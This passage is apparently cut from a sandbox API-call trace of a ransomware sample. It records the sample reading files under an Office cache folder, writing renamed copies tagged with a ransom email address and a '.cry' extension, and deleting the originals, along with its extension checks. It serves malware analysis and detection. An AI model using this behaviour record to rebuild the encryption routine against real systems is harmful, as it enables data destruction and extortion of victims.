lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0x2ed90, lpOverlapped=0x0) returned 1 [0047.182] ReadFile (in: hFile=0x210, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.182] WriteFile (in: hFile=0x214, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.182] SetEndOfFile (hFile=0x214) returned 1 [0047.182] CloseHandle (hObject=0x214) returned 1 [0047.183] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.183] SetEndOfFile (hFile=0x210) returned 1 [0047.184] CloseHandle (hObject=0x210) returned 1 [0047.184] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0047.184] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll")) returned 1 [0047.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.185] lstrlenW (lpString=".doc") returned 4 [0047.185] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.185] lstrlenW (lpString=".docx") returned 5 [0047.185] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0047.185] lstrlenW (lpString=".pdf") returned 4 [0047.185] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.185] lstrlenW (lpString=".xls") returned 4 [0047.185] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.185] lstrlenW (lpString=".xlsx") returned 5 [0047.185] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0047.185] lstrlenW (lpString=".ppt") returned 4 [0047.185] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.185] lstrlenW (lpString=".zip") returned 4 [0047.185] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.185] lstrlenW (lpString=".rar") returned 4 [0047.185] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.185] lstrlenW (lpString=".bz2") returned 4 [0047.185] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.185] lstrlenW (lpString=".7z") returned 3 [0047.185] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.185] lstrlenW (lpString=".dbf") returned 4 [0047.185] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.185] lstrlenW (lpString=".1cd") returned 4 [0047.185] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.185] lstrlenW (lpString=".jpg") returned 4 [0047.185] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.186] lstrlenW (lpString=".doc") returned 4 [0047.186] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.186] lstrlenW (lpString=".docx") returned 5 [0047.186] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0047.186] lstrlenW (lpString=".pdf") returned 4 [0047.186] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.186] lstrlenW (lpString=".xls") returned 4 [0047.186] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.186] lstrlenW (lpString=".xlsx") returned 5 [0047.186] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0047.186] lstrlenW (lpString=".ppt") returned 4 [0047.186] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.186] lstrlenW (lpString=".zip") returned 4 [0047.186] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.186] lstrlenW (lpString=".rar") returned 4 [0047.186] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.186] lstrlenW (lpString=".bz2") returned 4 [0047.186] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.186] lstrlenW (lpString=".7z") returned 3 [0047.186] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.186] lstrlenW (lpString=".dbf") returned 4 [0047.186] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.186] lstrlenW (lpString=".1cd") returned 4 [0047.186] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.186] lstrlenW (lpString=".jpg") returned 4 [0047.187] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.187] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0047.187] lstrlenW (lpString="AccessMUI.msi") returned 13 [0047.187] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0047.210] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=2517504) returned 1 [0047.210] CloseHandle (hObject=0x1ac) returned 1 [0047.210] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi")) returned 0x2020 [0047.210] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.210] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0047.211] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0047.211] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.211] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.211] ReadFile (in: hFile=0x1ac, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.293] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xcce00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.293] ReadFile (in: hFile=0x1ac, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.348] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.348] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x226a00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.348] ReadFile (in: hFile=0x1ac, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.609] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.609] WriteFile (in: hFile=0x1ac, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0047.629] SetEndOfFile (hFile=0x1ac) returned 1 [0047.631] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x40240c0 [0047.641] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.641] WriteFile (in: hFile=0x1ac, lpBuffer=0x40240c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x40240c0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.643] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xcce00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.643] WriteFile (in: hFile=0x1ac, lpBuffer=0x40240c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x40240c0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.648] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x226a00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.648] WriteFile (in: hFile=0x1ac, lpBuffer=0x40240c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x40240c0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.653] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x40240c0 | out: hHeap=0x600000) returned 1 [0047.653] CloseHandle (hObject=0x1ac) returned 1 [0047.653] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0047.653] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0047.654] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0047.654] lstrlenW (lpString=".doc") returned 4 [0047.656] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.658] lstrlenW (lpString=".docx") returned 5 [0047.658] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0047.658] lstrlenW (lpString=".pdf") returned 4 [0047.658] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.658] lstrlenW (lpString=".xls") returned 4 [0047.658] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.658] lstrlenW (lpString=".xlsx") returned 5 [0047.658] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0047.658] lstrlenW (lpString=".ppt") returned 4 [0047.658] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0047.658] lstrlenW (lpString=".zip") returned 4 [0047.658] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.658] lstrlenW (lpString=".rar") returned 4 [0047.658] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.658] lstrlenW (lpString=".bz2") returned 4 [0047.658] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.658] lstrlenW (lpString=".7z") returned 3 [0047.658] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0047.658] lstrlenW (lpString=".dbf") returned 4 [0047.658] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0047.658] lstrlenW (lpString=".1cd") returned 4 [0047.658] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0047.658] lstrlenW (lpString=".jpg") returned 4 [0047.658] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0047.658] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0047.658] lstrlenW (lpString=".doc") returned 4 [0047.659] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.659] lstrlenW (lpString=".docx") returned 5 [0047.659] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0047.659] lstrlenW (lpString=".pdf") returned 4 [0047.659] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.659] lstrlenW (lpString=".xls") returned 4 [0047.659] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.659] lstrlenW (lpString=".xlsx") returned 5 [0047.659] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0047.659] lstrlenW (lpString=".ppt") returned 4 [0047.659] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.659] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0047.659] lstrlenW (lpString=".zip") returned 4 [0047.659] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.659] lstrlenW (lpString=".rar") returned 4 [0047.659] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.659] lstrlenW (lpString=".bz2") returned 4 [0047.659] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.659] lstrlenW (lpString=".7z") returned 3 [0047.659] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.659] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0047.659] lstrlenW (lpString=".dbf") returned 4 [0047.659] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.659] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0047.659] lstrlenW (lpString=".1cd") returned 4 [0047.659] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.659] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0047.659] lstrlenW (lpString=".jpg") returned 4 [0047.659] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.659] lstrcmpiW (lpString1=".exe", lpString2=".cry") returned 1 [0047.659] lstrlenW (lpString="ose.exe") returned 7 [0047.659] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.660] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=174440) returned 1 [0047.660] CloseHandle (hObject=0x214) returned 1 [0047.660] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0047.660] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.660] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.660] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.660] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.660] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.660] GetLastError () returned 0x0 [0047.660] ReadFile (in: hFile=0x214, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x2a968, lpOverlapped=0x0) returned 1 [0047.710] WriteFile (in: hFile=0x210, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0x2a970, lpOverlapped=0x0) returned 1 [0047.713] ReadFile (in: hFile=0x214, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.713] WriteFile (in: hFile=0x210, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xe2, lpOverlapped=0x0) returned 1 [0047.713] SetEndOfFile (hFile=0x210) returned 1 [0047.713] CloseHandle (hObject=0x210) returned 1 [0047.713] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.713] SetEndOfFile (hFile=0x214) returned 1 [0047.715] CloseHandle (hObject=0x214) returned 1 [0047.715] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0047.715] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0047.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.716] lstrlenW (lpString=".doc") returned 4 [0047.716] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0047.716] lstrlenW (lpString=".docx") returned 5 [0047.716] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0047.716] lstrlenW (lpString=".pdf") returned 4 [0047.716] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0047.716] lstrlenW (lpString=".xls") returned 4 [0047.716] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0047.716] lstrlenW (lpString=".xlsx") returned 5 [0047.716] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0047.716] lstrlenW (lpString=".ppt") returned 4 [0047.716] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0047.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.716] lstrlenW (lpString=".zip") returned 4 [0047.716] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0047.716] lstrlenW (lpString=".rar") returned 4 [0047.716] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0047.716] lstrlenW (lpString=".bz2") returned 4 [0047.716] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0047.716] lstrlenW (lpString=".7z") returned 3 [0047.716] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0047.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.716] lstrlenW (lpString=".dbf") returned 4 [0047.716] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0047.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.716] lstrlenW (lpString=".1cd") returned 4 [0047.716] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0047.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.716] lstrlenW (lpString=".jpg") returned 4 [0047.716] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0047.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.717] lstrlenW (lpString=".doc") returned 4 [0047.717] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0047.717] lstrlenW (lpString=".docx") returned 5 [0047.717] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0047.717] lstrlenW (lpString=".pdf") returned 4 [0047.717] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0047.717] lstrlenW (lpString=".xls") returned 4 [0047.717] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0047.717] lstrlenW (lpString=".xlsx") returned 5 [0047.717] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0047.717] lstrlenW (lpString=".ppt") returned 4 [0047.717] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0047.717] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.717] lstrlenW (lpString=".zip") returned 4 [0047.717] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0047.717] lstrlenW (lpString=".rar") returned 4 [0047.717] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0047.717] lstrlenW (lpString=".bz2") returned 4 [0047.717] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0047.717] lstrlenW (lpString=".7z") returned 3 [0047.717] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0047.717] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.717] lstrlenW (lpString=".dbf") returned 4 [0047.717] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0047.717] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.717] lstrlenW (lpString=".1cd") returned 4 [0047.717] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0047.717] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0047.717] lstrlenW (lpString=".jpg") returned 4 [0047.717] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0047.717] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0047.717] lstrlenW (lpString="osetup.dll") returned 10 [0047.717] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.718] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=7378792) returned 1 [0047.718] CloseHandle (hObject=0x214) returned 